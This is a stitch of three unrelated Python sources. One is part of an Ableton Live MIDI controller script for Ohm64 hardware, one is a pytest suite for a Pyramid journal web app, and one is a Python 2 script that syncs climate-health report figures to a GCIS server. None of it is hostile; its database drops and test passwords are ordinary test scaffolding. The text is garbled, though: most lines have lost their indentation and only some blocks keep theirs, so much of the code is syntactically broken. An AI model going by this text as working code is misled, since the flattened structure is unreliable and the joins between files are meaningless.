def assign_channel_select_buttons(self):
for index in range(4):
#if(self._mixer.channel_strip(index)):
self._button[index].set_on_off_values(127, 0)
self._mixer.channel_strip(index).set_select_button(self._button[index])
if(self._r_function_mode._mode_index < 3):
for index in range(4):
#if(self._mixer2.channel_strip(index)):
self._button[index + 4].set_on_off_values(127, 0)
self._mixer2.channel_strip(index).set_select_button(self._button[index + 4])
#elif(self._r_function_mode._mode_index < 3):
else:
for index in range(4):
#if(self._mixer2.return_strip(index)):
self._button[index + 4].set_on_off_values(1, 0)
self._mixer2.return_strip(index).set_select_button(self._button[index + 4])
def assign_return_select_buttons(self):
for index in range(4):
self._button[index + 4].set_off_value(0)
if(self._mixer.channel_strip(index)):
self._button[index + 4].set_on_value(1)
self._mixer.channel_strip(index).set_select_button(self._button[index + 4])
def assign_l_channel_select_buttons(self):
self._mixer.set_select_buttons(None, None)
self._session.set_select_buttons(None, None)
for index in range(4):
self._button[index].set_off_value(0)
if(self._mixer.channel_strip(index)):
self._mixer.channel_strip(index).set_select_button(self._button[index])
def assign_r_channel_select_buttons(self):
self._mixer2.set_select_buttons(None, None)
self._session2.set_select_buttons(None, None)
for index in range(4):
self._button[index + 4].set_off_value(0)
if(self._mixer2.channel_strip(index)):
self._mixer2.channel_strip(index).set_select_button(self._button[index + 4])
def assign_main_channel_select_buttons(self):
for index in range(8):
self._button[index].set_off_value(0)
if(self._mixer.channel_strip(index)):
self._button[index].set_on_value(127)
self._mixer.channel_strip(index).set_select_button(self._button[index])
def assign_shift_controls(self):
if self._disable_master is False:
self.deassign_right_controls()
self._mixer.master_strip().set_volume_control(self._fader[7])
self._mixer.set_prehear_volume_control(self._dial[15])
self._mixer2.return_strip(0).set_send_controls(tuple([None, self._fader[4]]))
self._mixer2.return_strip(1).set_send_controls(tuple([self._fader[5], None]))
"""called on timer"""
def update_display(self):
ControlSurface.update_display(self)
self._timer = (self._timer + 1) % 256
self.flash()
self.strobe()
def flash(self):
if(self.flash_status > 0):
for control in self.controls:
if isinstance(control, MonoButtonElement):
control.flash(self._timer)
    def strobe(self):
        if(self._backlight_type != 'static'):
            if(self._backlight_type == 'pulse'):
                self._backlight = int(math.fabs(((self._timer * 8) % 64) - 32) + 32)
            if(self._backlight_type == 'up'):
                self._backlight = int(((self._timer * 4) % 64) + 16)
            if(self._backlight_type == 'down'):
                self._backlight = int(math.fabs(int(((self._timer * 4) % 64) - 64)) + 16)
            if(self._rgb == 1):
                self._send_midi(tuple([176, 27, int(self._backlight)]))
            else:
                self._send_midi(tuple([176, 118, int(self._backlight)]))
        if(self._ohm_type != 'static'):
            if(self._ohm_type == 'pulse'):
                self._ohm = int(math.fabs(((self._timer * 8) % 64) - 32) + 32)
            if(self._ohm_type == 'up'):
                self._ohm = int(((self._timer * 4) % 64) + 16)
            if(self._ohm_type == 'down'):
                self._ohm = int(math.fabs(int(((self._timer * 4) % 64) - 64)) + 16)
            if(self._rgb == 1):
                self._send_midi(tuple([176, 63, int(self._ohm)]))
                self._send_midi(tuple([176, 31, int(self._ohm)]))
            else:
                self._send_midi(tuple([176, 119, int(self._ohm)]))
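    # Rough reading of the arithmetic above (an inference from the code, not
    # documented behavior): with _timer cycling 0-255, 'pulse' produces a
    # triangle wave between roughly 32 and 64, while 'up' and 'down' produce
    # rising and falling ramps from about 16 to 80; the result is sent as a CC
    # value to drive the backlight and Ohm LEDs.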
"""m4l bridge"""
def generate_strip_string(self, display_string):
NUM_CHARS_PER_DISPLAY_STRIP = 12
if (not display_string):
return (' ' * NUM_CHARS_PER_DISPLAY_STRIP)
if ((len(display_string.strip()) > (NUM_CHARS_PER_DISPLAY_STRIP - 1)) and (display_string.endswith('dB') and (display_string.find('.') != -1))):
display_string = display_string[:-2]
if (len(display_string) > (NUM_CHARS_PER_DISPLAY_STRIP - 1)):
for um in [' ',
'i',
'o',
'u',
'e',
'a']:
while ((len(display_string) > (NUM_CHARS_PER_DISPLAY_STRIP - 1)) and (display_string.rfind(um, 1) != -1)):
um_pos = display_string.rfind(um, 1)
display_string = (display_string[:um_pos] + display_string[(um_pos + 1):])
else:
display_string = display_string.center((NUM_CHARS_PER_DISPLAY_STRIP - 1))
ret = u''
for i in range((NUM_CHARS_PER_DISPLAY_STRIP - 1)):
if ((ord(display_string[i]) > 127) or (ord(display_string[i]) < 0)):
ret += ' '
else:
ret += display_string[i]
ret += ' '
ret = ret.replace(' ', '_')
assert (len(ret) == NUM_CHARS_PER_DISPLAY_STRIP)
return ret
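    # Worked example with a made-up track name: generate_strip_string('Grand Piano Pad')
    # first drops spaces, then vowels from the right, until eleven characters remain,
    # then pads to twelve and replaces spaces with underscores, yielding 'GrandPanPad_'.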
def notification_to_bridge(self, name, value, sender):
if(isinstance(sender, MonoEncoderElement)):
self._monobridge._send(sender.name, 'lcd_name', str(self.generate_strip_string(name)))
self._monobridge._send(sender.name, 'lcd_value', str(self.generate_strip_string(value)))
def touched(self):
if(self._shift_mode._mode_index < 2):
            if self._touched == 0:
self._monobridge._send('touch', 'on')
self.schedule_message(2, self.check_touch)
self._touched +=1
def check_touch(self):
if(self._shift_mode._mode_index < 2):
if self._touched > 5:
self._touched = 5
elif self._touched > 0:
self._touched -= 1
            if self._touched == 0:
self._monobridge._send('touch', 'off')
else:
self.schedule_message(2, self.check_touch)
    def get_clip_names(self):
        clip_names = []
        for scene in self._session._scenes:
            for clip_slot in scene._clip_slots:
                if clip_slot.has_clip() is True:
                    clip_names.append(clip_slot._clip_slot)  ##.clip.name
                    ##self.log_message(str(clip_slot._clip_slot.clip.name))
        return clip_names
"""midi functionality"""
def to_encoder(self, num, val):
rv=int(val*127)
self._device._parameter_controls[num].receive_value(rv)
p = self._device._parameter_controls[num]._parameter_to_map_to
newval = (val * (p.max - p.min)) + p.min
p.value = newval
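    # Note: val is expected as a normalized 0.0-1.0 fraction; it is scaled to
    # 0-127 for the control element and onto the mapped parameter's own range,
    # e.g. val=0.5 on a parameter spanning -1.0..1.0 lands on 0.0.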
def handle_sysex(self, midi_bytes):
assert(isinstance (midi_bytes, tuple))
#self.log_message(str('sysex') + str(midi_bytes))
if len(midi_bytes) > 10:
if midi_bytes[:11] == tuple([240, 126, 0, 6, 2, 0, 1, 97, 1, 0, 7]):
self.show_message(str('Ohm64 RGB detected...setting color map'))
self.log_message(str('Ohm64 RGB detected...setting color map'))
self._rgb = 0
self._host._host_name = 'OhmRGB'
self._color_type = 'OhmRGB'
for button in self._button:
button._color_map = COLOR_MAP
for column in self._grid:
for button in column:
button._color_map = COLOR_MAP
elif midi_bytes[:11] == tuple([240, 126, 0, 6, 2, 0, 1, 97, 1, 0, 2]):
self.show_message(str('Ohm64 Monochrome detected...setting color map'))
self.log_message(str('Ohm64 Monochrome detected...setting color map'))
self._rgb = 1
self._host._host_name = 'Ohm64'
self._color_type = 'Monochrome'
for button in self._button:
button._color_map = [127 for index in range(0, 7)]
for column in self._grid:
for button in column:
button._color_map = [127 for index in range(0, 7)]
self._assign_session_colors()
    def receive_external_midi(self, midi_bytes):
        #self.log_message('receive_external_midi' + str(midi_bytes))
        assert (midi_bytes is not None)
        assert isinstance(midi_bytes, tuple)
        with self.component_guard():
            if (len(midi_bytes) == 3):
                msg_type = (midi_bytes[0] & 240)
                forwarding_key = [midi_bytes[0]]
                self.log_message(str(self._forwarding_registry))
                if (msg_type != MIDI_PB_TYPE):
                    forwarding_key.append(midi_bytes[1])
                # use .get so unmapped messages fall through to the None check below
                recipient = self._forwarding_registry.get(tuple(forwarding_key), None)
                self.log_message('receive_midi recipient ' + str(recipient))
                if (recipient is not None):
                    recipient.receive_value(midi_bytes[2])
            else:
                self.handle_sysex(midi_bytes)
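    # Routing note (inferred from the lookup above): three-byte channel messages
    # are matched in _forwarding_registry by (status, data1), except pitch bend,
    # which is keyed by status alone -- e.g. a note-on tuple (144, 64, 127) is
    # looked up under (144, 64) and its velocity handed to receive_value().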
"""general functionality"""
def set_highlighting_session_component(self, session_component):
self._highlighting_session_component = session_component
self._highlighting_session_component.set_highlighting_callback(self._set_session_highlight)
def allow_updates(self, allow_updates):
for component in self.components:
component.set_allow_update(int(allow_updates!=0))
def disconnect(self):
"""clean things up on disconnect"""
"""for s in self._control_surfaces():
self.log_message('monohm disconnect finds ' + str(s))
if '_version_check' in dir(s):
if s._version_check == 'b994':
s.disconnect()"""
self._update_linked_device_selection = None
if self._session._is_linked():
self._session._unlink()
if self._cntrlr != None:
self._cntrlr._monohm = None
self._cntrlr = None
if self.song().view.selected_track_has_listener(self._update_selected_device):
self.song().view.remove_selected_track_listener(self._update_selected_device)
if self._session2.offset_has_listener(self._on_session_offset_changes):
self._session2.remove_offset_listener(self._on_session_offset_changes)
#self._disconnect_notifier.set_mode(0)
self.log_message("--------------= MonOhm " + str(self._monomod_version) + " log closed =--------------") #Create entry in log file
ControlSurface.disconnect(self)
return None
def device_follows_track(self, val):
self._device_selection_follows_track_selection = (val == 1)
return self
def _update_selected_device(self):
if(self._clutch_device_selection == False):
if self._device_selection_follows_track_selection is True:
track = self.song().view.selected_track
device_to_select = track.view.selected_device
if device_to_select == None and len(track.devices) > 0:
device_to_select = track.devices[0]
if device_to_select != None:
self.song().view.select_device(device_to_select)
#self._device.set_device(device_to_select)
self.set_appointed_device(device_to_select)
#self._device_selector.set_enabled(True)
self.request_rebuild_midi_map()
return None
def assign_alternate_mappings(self):
for column in range(8):
for row in range(8):
self._grid[column][row].set_identifier(OHM_MAP_ID[column][row])
                self._grid[column][row].set_channel(OHM_MAP_CHANNEL[column][row])
self._grid[column][row].send_value(OHM_MAP_VALUE[column][row])
self._grid[column][row].set_enabled(False)
def get_session_offsets(self):
if(self._is_split is True):
return [self._session.track_offset(), self._session.scene_offset(), self._session2.track_offset(), self._session2.scene_offset()]
elif(self._is_split is False):
return [self._session_main.track_offset(), self._session_main.scene_offset(), (self._session_main.track_offset()) + 4, self._session_main.scene_offset()]
def set_split_mixer(self, is_split):
assert isinstance(is_split, type(False))
if(is_split!=self._is_split):
if(is_split is True):
self._mixer._track_offset = self._session._track_offset
else:
self._mixer._track_offset = self._session_main._track_offset
self._is_split = is_split
self._session_main.set_enabled(not is_split)
self._session.set_enabled(is_split)
self._session2.set_enabled(is_split)
self._mixer._reassign_tracks()
def set_split_mixer_monomod(self, is_split):
assert isinstance(is_split, type(False))
if(is_split!=self._is_split):
if(is_split is True):
self._mixer._track_offset = self._session._track_offset
else:
self._mixer._track_offset = self._session_main._track_offset
self._is_split = is_split
self._mixer._reassign_tracks()
def split_mixer(self):
return self._is_split
def _get_num_tracks(self):
return self.num_tracks
def _recalculate_selected_channel(self):
selected = False
for index in range(4):
if self.song().view.selected_track == self._mixer.channel_strip(index)._track:
selected = True
elif self.song().view.selected_track == self._mixer2.channel_strip(index)._track:
selected = True
if selected is False:
self.song().view.selected_track = self._mixer2.channel_strip(0)._track
def _on_device_changed(self, device):
#self.log_message('new device ' + str(type(device)))
if self._update_linked_device_selection != None:
self._update_linked_device_selection(device)
def mixer_on_cf_assign_changed(self, channel_strip):
def _on_cf_assign_changed():
if (channel_strip.is_enabled() and (channel_strip._crossfade_toggle != None)):
if (channel_strip._track != None) and (channel_strip._track in (channel_strip.song().tracks + channel_strip.song().return_tracks)):
if channel_strip._track.mixer_device.crossfade_assign == 1: #modified
channel_strip._crossfade_toggle.turn_off()
elif channel_strip._track.mixer_device.crossfade_assign == 0:
channel_strip._crossfade_toggle.send_value(1)
else:
channel_strip._crossfade_toggle.send_value(2)
return _on_cf_assign_changed
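    # Inferred mapping for the toggle above: Live's crossfade_assign is 0/1/2
    # for A / none / B, so an unassigned strip turns its LED off, A-side strips
    # get value 1 and B-side strips get value 2.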
def device_is_banking_enabled(self, device):
def _is_banking_enabled():
return True
return _is_banking_enabled
def _on_session_offset_changes(self):
if self._r_function_mode._mode_index in range(0,3):
self._mem[int(self._r_function_mode._mode_index)] = self._session2.track_offset()
def connect_script_instances(self, instanciated_scripts):
link = False
for s in instanciated_scripts:
if '_monomod_version' in dir(s):
if s._monomod_version == self._monomod_version:
if '_link_mixer' in dir(s):
if s._link_mixer is True:
link = True
if link is True:
if not self._session._is_linked():
self._session.set_offsets(LINK_OFFSET[0], LINK_OFFSET[1])
self._session._link()
"""for s in self._control_surfaces():
self.log_message('monohm finds ' + str(s))
if '_version_check' in dir(s):
if s._version_check == 'b994':
if s._awake == False:
s.connect_script_instances(instanciated_scripts)"""
def device_set_device(self, device_component):
def _set_device(device):
DeviceComponent.set_device(device_component, device)
self._on_device_changed(device)
return _set_device
def _on_device_changed(self, device):
#self.log_message('new device ' + str(type(device)))
if self._update_linked_device_selection != None:
self._update_linked_device_selection(device)
|
|
# -*- coding: utf-8 -*-
from contextlib import closing
from pyramid import testing
import pytest
import datetime
import os
from psycopg2 import IntegrityError
from webtest.app import AppError
from cryptacular.bcrypt import BCRYPTPasswordManager
from journal import connect_db
from journal import DB_SCHEMA
from journal import INSERT_ENTRY
TEST_DSN = 'dbname=test_learning_journal user=ndraper2'
def init_db(settings):
with closing(connect_db(settings)) as db:
db.cursor().execute(DB_SCHEMA)
db.commit()
def clear_db(settings):
with closing(connect_db(settings)) as db:
db.cursor().execute("DROP TABLE entries")
db.commit()
def clear_entries(settings):
with closing(connect_db(settings)) as db:
db.cursor().execute("DELETE FROM entries")
db.commit()
def run_query(db, query, params=(), get_results=True):
cursor = db.cursor()
cursor.execute(query, params)
db.commit()
results = None
if get_results:
results = cursor.fetchall()
return results
@pytest.fixture(scope='session')
def db(request):
"""set up and tear down a database"""
settings = {'db': TEST_DSN}
init_db(settings)
def cleanup():
clear_db(settings)
request.addfinalizer(cleanup)
return settings
@pytest.yield_fixture(scope='function')
def req_context(db, request):
"""mock a request with a database attached"""
settings = db
req = testing.DummyRequest()
with closing(connect_db(settings)) as db:
req.db = db
req.exception = None
yield req
# after a test has run, we clear out entries for isolation
clear_entries(settings)
def test_write_entry(req_context):
from journal import write_entry
fields = ('title', 'text')
expected = ('Test Title', 'Test Text')
req_context.params = dict(zip(fields, expected))
# assert that there are no entries when we start
rows = run_query(req_context.db, "SELECT * FROM entries")
assert len(rows) == 0
result = write_entry(req_context)
# manually commit so we can see the entry on query
req_context.db.commit()
rows = run_query(req_context.db, "SELECT title, text FROM entries")
assert len(rows) == 1
actual = rows[0]
for idx, val in enumerate(expected):
assert val == actual[idx]
def test_write_entry_not_string(req_context):
# 5 gets turned into a string, None throws an integrity error
from journal import write_entry
fields = ('title', 'text')
expected = (5, None)
req_context.params = dict(zip(fields, expected))
# assert that there are no entries when we start
rows = run_query(req_context.db, "SELECT * FROM entries")
assert len(rows) == 0
with pytest.raises(IntegrityError):
result = write_entry(req_context)
def test_write_entry_wrong_columns(req_context):
# throws integrity error for not writing into title and text
from journal import write_entry
fields = ('bob', 'hope')
expected = ('some text', 'more text')
req_context.params = dict(zip(fields, expected))
# assert that there are no entries when we start
rows = run_query(req_context.db, "SELECT * FROM entries")
assert len(rows) == 0
with pytest.raises(IntegrityError):
result = write_entry(req_context)
def test_write_entry_extra_columns(req_context):
# when we write into columns that aren't there, nothing happens
from journal import write_entry
fields = ('title', 'bob', 'text', 'hope')
expected = ('some text', 'more text', 'more', 'less')
req_context.params = dict(zip(fields, expected))
# assert that there are no entries when we start
rows = run_query(req_context.db, "SELECT * FROM entries")
assert len(rows) == 0
result = write_entry(req_context)
# manually commit so we can see the entry on query
req_context.db.commit()
rows = run_query(req_context.db, "SELECT title, text FROM entries")
assert len(rows) == 1
assert rows == [('some text', 'more')]
def test_read_entries_empty(req_context):
# call the function under test
from journal import read_entries
result = read_entries(req_context)
# make assertions about the result
assert 'entries' in result
assert len(result['entries']) == 0
def test_read_entries(req_context):
# prepare data for testing
now = datetime.datetime.utcnow()
expected = ('Test Title', 'Test Text', now)
run_query(req_context.db, INSERT_ENTRY, expected, False)
# call the function under test
from journal import read_entries
result = read_entries(req_context)
# make assertions about the result
assert 'entries' in result
assert len(result['entries']) == 1
for entry in result['entries']:
assert expected[0] == entry['title']
assert expected[1] == entry['text']
for key in 'id', 'created':
assert key in entry
@pytest.fixture(scope='function')
def app(db):
from journal import main
from webtest import TestApp
os.environ['DATABASE_URL'] = TEST_DSN
app = main()
return TestApp(app)
def test_empty_listing(app):
response = app.get('/')
assert response.status_code == 200
actual = response.body
expected = 'No entries here so far'
assert expected in actual
@pytest.fixture(scope='function')
def entry(db, request):
"""provide a single entry in the database"""
settings = db
now = datetime.datetime.utcnow()
expected = ('Test Title', 'Test Text', now)
with closing(connect_db(settings)) as db:
run_query(db, INSERT_ENTRY, expected, False)
db.commit()
def cleanup():
clear_entries(settings)
request.addfinalizer(cleanup)
return expected
def test_listing(app, entry):
response = app.get('/')
assert response.status_code == 200
actual = response.body
for expected in entry[:2]:
assert expected in actual
def test_post_to_add_view(app):
entry_data = {
'title': 'Hello there',
'text': 'This is a post',
}
response = app.post('/add', params=entry_data, status='3*')
redirected = response.follow()
actual = redirected.body
for expected in entry_data.values():
assert expected in actual
def test_post_to_add_view_using_get(app):
entry_data = {
'title': 'Hello there',
'text': 'This is a post',
}
with pytest.raises(AppError):
response = app.get('/add', params=entry_data, status='3*')
@pytest.fixture(scope='function')
def auth_req(request):
manager = BCRYPTPasswordManager()
settings = {
'auth.username': 'admin',
'auth.password': manager.encode('secret'),
}
testing.setUp(settings=settings)
req = testing.DummyRequest()
def cleanup():
testing.tearDown()
request.addfinalizer(cleanup)
return req
def test_do_login_success(auth_req):
from journal import do_login
auth_req.params = {'username': 'admin', 'password': 'secret'}
assert do_login(auth_req)
def test_do_login_bad_pass(auth_req):
from journal import do_login
auth_req.params = {'username': 'admin', 'password': 'wrong'}
assert not do_login(auth_req)
def test_do_login_bad_user(auth_req):
from journal import do_login
auth_req.params = {'username': 'bad', 'password': 'secret'}
assert not do_login(auth_req)
def test_do_login_missing_params(auth_req):
from journal import do_login
for params in ({'username': 'admin'}, {'password': 'secret'}):
auth_req.params = params
with pytest.raises(ValueError):
do_login(auth_req)
INPUT_BTN = '<input type="submit" value="Share" name="Share"/>'
def login_helper(username, password, app):
"""encapsulate app login for reuse in tests
Accept all status codes so that we can make assertions in tests
"""
login_data = {'username': username, 'password': password}
return app.post('/login', params=login_data, status='*')
def test_start_as_anonymous(app):
response = app.get('/', status=200)
actual = response.body
assert INPUT_BTN not in actual
def test_login_success(app):
username, password = ('admin', 'secret')
redirect = login_helper(username, password, app)
assert redirect.status_code == 302
response = redirect.follow()
assert response.status_code == 200
actual = response.body
assert INPUT_BTN in actual
def test_login_fails(app):
username, password = ('admin', 'wrong')
response = login_helper(username, password, app)
assert response.status_code == 200
actual = response.body
assert "Login Failed" in actual
assert INPUT_BTN not in actual
def test_logout(app):
# re-use existing code to ensure we are logged in when we begin
test_login_success(app)
redirect = app.get('/logout', status="3*")
response = redirect.follow()
assert response.status_code == 200
actual = response.body
assert INPUT_BTN not in actual
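# A possible further check (left as a sketch; it assumes the '/logout' route
# exercised above also permits anonymous visitors and simply redirects home):
#
#     def test_logout_when_anonymous(app):
#         redirect = app.get('/logout', status="3*")
#         response = redirect.follow()
#         assert response.status_code == 200
#         assert INPUT_BTN not in response.body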
|
|
__author__ = 'abuddenberg'
from gcis_clients import GcisClient, SurveyClient, survey_token, gcis_dev_auth, gcis_stage_auth
from gcis_clients.domain import Report, Chapter
# from sync_utils import realize_parents, realize_contributors
from collections import OrderedDict
import pickle
import sys
# gcis = GcisClient('http://data.gcis-dev-front.joss.ucar.edu', *gcis_dev_auth)
gcis = GcisClient('https://data-stage.globalchange.gov', *gcis_stage_auth)
surveys = SurveyClient('https://healthresources.cicsnc.org', survey_token)
sync_metadata_tree = {
'usgcrp-climate-human-health-assessment-2016': OrderedDict([
('front-matter', [
('/metadata/figures/3931', 'understanding-the-exposure-pathway-diagrams'),
]),
('executive-summary', [
('/metadata/figures/3906', 'examples-of-climate-impacts-on-human-health'),
('/metadata/figures/3832', 'es-climate-change-and-health'),
('/metadata/figures/3833', 'es-projected-changes-in-deaths-in-us-cities-by-season'),
('/metadata/figures/3834', 'es-projected-change-in-temperature-ozone-and-ozone-related-premature-deaths-in-2030'),
('/metadata/figures/3838', 'es-estimated-deaths-and-billion-dollar-losses-from-extreme-weather-events-in-the-u-s-2004-2013'),
('/metadata/figures/3835', 'es-changes-in-lyme-disease-case-report-distribution'),
('/metadata/figures/3836', 'es-links-between-climate-change-water-quantity-and-quality-and-human-exposure-to-water-related-illness'),
('/metadata/figures/3837', 'es-farm-to-table'),
('/metadata/figures/3839', 'es-the-impact-of-climate-change-on-physical-mental-and-community-health'),
('/metadata/figures/3840', 'es-determinants-of-vulnerability')
]),
('climate-change-and-human-health', [
('/metadata/figures/3698', 'major-us-climate-trends'), #1.1 #climate-change-and-human-health
('/metadata/figures/3632', 'change-in-number-of-extreme-precipitation-events'), #1.2 #climate-change-and-human-health
('/metadata/figures/3635', 'projected-changes-in-temperature-and-precipitation-by-mid-century'), #1.3 #climate-change-and-human-health
('/metadata/figures/3633', 'projected-changes-in-hottest-coldest-and-wettest-driest-day-of-the-year'), #1.4 #climate-change-and-human-health
('/metadata/figures/3757', 'climate-change-and-health'), #1.5 #climate-change-and-human-health
('/metadata/figures/3933', 'sources-of-uncertainty'), #1.6 #climate-change-and-human-health
]),
('temperature-related-death-and-illness', [
('/metadata/figures/3811', 'climate-change-and-health-extreme-heat'), #2.1 #temperature-related-death-and-illness
('/metadata/figures/3585', 'heat-related-deaths-during-the-1995-chicago-heat-wave'), #2.2 #temperature-related-death-and-illness
('/metadata/figures/3643', 'projected-changes-in-temperature-related-death-rates'), #2.3 #temperature-related-death-and-illness
('/metadata/figures/3653', 'projected-changes-in-deaths-in-us-cities-by-season'), #2.4 #temperature-related-death-and-illness
]),
('air-quality-impacts', [
('/metadata/figures/3812', 'climate-change-and-health-outdoor-air-quality'), #3.1 #air-quality-impacts
('/metadata/figures/3647', 'projected-change-in-temperature-ozone-and-ozone-related-premature-deaths-in-2030'), #3.2 #air-quality-impacts
('/metadata/figures/3649', 'projected-change-in-ozone-related-premature-deaths'), #3.3 #air-quality-impacts
('/metadata/figures/3650', 'ragweed-pollen-season-lengthens'), #3.4 #air-quality-impacts
]),
('extreme-events', [
('/metadata/figures/3810', 'estimated-deaths-and-billion-dollar-losses-from-extreme-weather-events-in-the-us-2004-2013'), #4.1 #extreme-weather #Has Activities
('/metadata/figures/3808', 'climate-change-and-health-flooding'), #4.2 #extreme-weather
('/metadata/figures/3760', 'hurricane-induced-flood-effects-in-eastern-and-central-united-states'), #4.3 #extreme-weather
('/metadata/figures/3907', 'projected-increases-in-very-large-fires'), #4.4 #extreme-weather
]),
('vectorborne-diseases', [
('/metadata/figures/3807', 'climate-change-and-health-lyme-disease'), #5.1 #vectorborne-diseases
('/metadata/figures/3659', 'changes-in-lyme-disease-case-report-distribution'), #5.2 #vectorborne-diseases
('/metadata/figures/3658', 'life-cycle-of-blacklegged-ticks-ixodes-scapularis'), #5.3 #vectorborne-diseases
('/metadata/figures/3747', 'projected-change-in-lyme-disease-onset-week'), #5.4 #vectorborne-diseases
('/metadata/figures/3674', 'incidence-of-west-nile-neuroinvasive-disease-by-county-in-the-united-states'), #5.5 #vectorborne-diseases
('/metadata/figures/3675', 'climate-impacts-on-west-nile-virus-transmission'), #5.6 #vectorborne-diseases
]),
('water-related-illnesses', [
('/metadata/figures/3824', 'climate-change-and-health-vibrio'), #5.1 #water-related-illnesses
('/metadata/figures/3700', 'links-between-climate-change-water-quantity-and-quality-and-human-exposure-to-water-related-illness'), #5.2 #water-related-illnesses #TOO BIG
('/metadata/figures/3671', 'locations-of-livestock-and-projections-of-heavy-precipitation'), #5.3 #water-related-illnesses #TOO BIG
('/metadata/figures/3709', 'projections-of-vibrio-occurrence-and-abundance-in-chesapeake-bay'), #5.4 #water-related-illnesses
('/metadata/figures/3704', 'changes-in-suitable-coastal-vibrio-habitat-in-alaska'), #5.5 #water-related-illnesses
('/metadata/figures/3734', 'projected-changes-in-caribbean-gambierdiscus-species'), #5.6 #water-related-illnesses
('/metadata/figures/3712', 'projections-of-growth-of-alexandrium-in-puget-sound'), #5.7 #water-related-illnesses
]),
('food-safety-nutrition-and-distribution', [
('/metadata/figures/3579', 'farm-to-table'), #7.1 #food-safety-nutrition-and-distribution
# ('/metadata/figures/3600', 'mycotoxin-in-corn'), #7.1 #food-safety-nutrition-and-distribution BOX 1?
('/metadata/figures/3809', 'climate-change-and-health-salmonella'), #7.2 #food-safety-nutrition-and-distribution
('/metadata/figures/3748', 'seasonality-of-human-illnesses-associated-with-foodborne-pathogens'), #7.3 #food-safety-nutrition-and-distribution
('/metadata/figures/3688', 'effects-of-carbon-dioxide-on-protein-and-minerals'), #7.4 #food-safety-nutrition-and-distribution
('/metadata/figures/3597', 'mississippi-river-level-at-st-louis-missouri'), #7.5 #food-safety-nutrition-and-distribution
# ('/metadata/figures/3600', 'mycotoxin-in-corn'), #Box 7,1
# ('/metadata/figures/3806', 'low-water-conditions-on-mississippi-river')
]),
('mental-health-and-well-being', [
('/metadata/figures/3789', 'climate-change-and-mental-health'), #8.1 #mental-health-and-well-being
('/metadata/figures/3722', 'the-impact-of-climate-change-on-physical-mental-and-community-health'), #8.2 #mental-health-and-well-being
]),
('populations-of-concern', [
('/metadata/figures/3696', 'determinants-of-vulnerability'), #9.1 #populations-of-concern
('/metadata/figures/3917', 'intersection-of-social-determinants-of-health-and-vulnerability'), #9.2 #populations-of-concern
('/metadata/figures/3758', 'vulnerability-to-the-health-impacts-of-climate-change-at-different-lifestages'), #9.3 #populations-of-concern
('/metadata/figures/3714', 'mapping-social-vulnerability'), #9.4 #populations-of-concern
('/metadata/figures/3717', 'mapping-communities-vulnerable-to-heat-in-georgia'), #9.5 #populations-of-concern
]),
('appendix-1--technical-support-document', [
('/metadata/figures/3623', 'scenarios-of-future-temperature-rise'), #1.1 #climate-change-and-human-health
('/metadata/figures/3939', 'example-increasing-spatial-resolution-of-climate-models'), #1.2 #climate-change-and-human-health
('/metadata/figures/3638', 'sensitivity-analysis-of-differences-in-modeling-approaches'), #1.3 #climate-change-and-human-health
('/metadata/figures/3932', 'tsd-sources-of-uncertainty'), #1.4 #climate-change-and-human-health
])
])
}
def main():
print gcis.test_login()
    image_id_map = pickle.load(open('image_id_cache.pk1', 'rb'))
# regenerate_image_id_map(existing=image_id_map)
# create_health_report()
# create_cmip5_report()
for report_id in sync_metadata_tree:
for chapter_id in sync_metadata_tree[report_id]:
for survey_url, figure_id in sync_metadata_tree[report_id][chapter_id]:
figure, datasets = surveys.get_survey(survey_url, do_download=False)
resp = gcis.post_figure_original(report_id, figure_id, figure.original, chapter_id=chapter_id)
print(resp.status_code, resp.text)
# gcis_fig = gcis.get_figure(report_id, figure_id, chapter_id=chapter_id)
#
# print survey_url, gen_edit_link(survey_url)
#
# figure, datasets = surveys.get_survey(survey_url, do_download=False)
#
# #Override identifier
# figure.identifier = figure_id
#
# #Pull existing captions
# if gcis.figure_exists(report_id, figure_id, chapter_id=chapter_id):
# gcis_fig = gcis.get_figure(report_id, figure_id, chapter_id=chapter_id)
# figure.caption = gcis_fig.caption
# figure.files = gcis_fig.files
#
# realize_parents(gcis, figure.parents)
# realize_contributors(gcis, figure.contributors)
#
# print 'Contributors: ', figure.contributors
# print 'Parents: ', figure.parents
#
# for ds in [p for p in figure.parents if p.publication_type_identifier == 'dataset']:
# # Assign synthetic activity identifier to for datasets associated with figure
# if ds.activity and ds.activity.identifier is None:
# ds.activity.identifier = generate_activity_id(figure, ds.publication)
# print 'Dataset: ', ds.activity
#
# #Create the figure in GCIS
# # print 'Creating figure... ', gcis.create_figure(report_id, chapter_id, figure, skip_images=True, skip_upload=False)
# print 'Updating figure... ', gcis.update_figure(report_id, chapter_id, figure, skip_images=True)
# # print 'Deleting old file', gcis.delete_file(figure.files[0])
# # print 'Uploading...', gcis.upload_figure_file(report_id, chapter_id, figure_id, figure.local_path)
#
# for i in figure.images:
# i.identifier = image_id_map[(figure_id, i.identifier)]
# print '\t', i
#
# realize_parents(gcis, i.parents)
# realize_contributors(gcis, i.contributors)
#
# print '\t\tContributors: ', i.contributors
# print '\t\tParents: ', i.parents
# for ds in [p for p in i.parents if p.publication_type_identifier == 'dataset']:
# # Assign synthetic activity identifier to for datasets associated with images
# if ds.activity and ds.activity.identifier is None:
# ds.activity.identifier = generate_activity_id(i, ds.publication)
# print '\t\tDataset: ', ds, ds.activity
#
# #Create image in GCIS
# # print 'Creating image... ', gcis.create_image(i, report_id=report_id, figure_id=figure_id)
# print 'Updating image... ', gcis.update_image(i)
def gen_edit_link(survey_id):
node_id = survey_id.split('/')[-1]
return 'https://healthresources.globalchange.gov/node/' + node_id
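# For example, the survey path '/metadata/figures/3931' listed in
# sync_metadata_tree above resolves to
# 'https://healthresources.globalchange.gov/node/3931'.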
def generate_activity_id(image, dataset):
try:
return '-'.join([image.identifier.split('-')[0], dataset.identifier, '-process'])
except Exception, e:
sys.stderr.write('WARNING: Activity identifier generation failed\n')
def regenerate_image_id_map(existing=None):
from uuid import uuid4
image_id_map = existing if existing else {}
for report_id in sync_metadata_tree:
for chapter_id in sync_metadata_tree[report_id]:
for survey_url, figure_id in sync_metadata_tree[report_id][chapter_id]:
s, ds = surveys.get_survey(survey_url, do_download=False)
for img in s.images:
if (figure_id, img.identifier) in image_id_map:
print 'skipping: ', (figure_id, img.identifier)
continue
else:
print 'added: ', (figure_id, img.identifier)
image_id_map[(figure_id, img.identifier)] = str(uuid4())
with open('image_id_cache.pk1', 'wb') as fout:
pickle.dump(image_id_map, fout)
print 'image_id_map regenerated'
def gen_survey_list():
realized_list = []
chapters = [c for c in sync_metadata_tree['usgcrp-climate-human-health-assessment-2016']]
survey_list = surveys.get_list()
for i, survey in enumerate(survey_list):
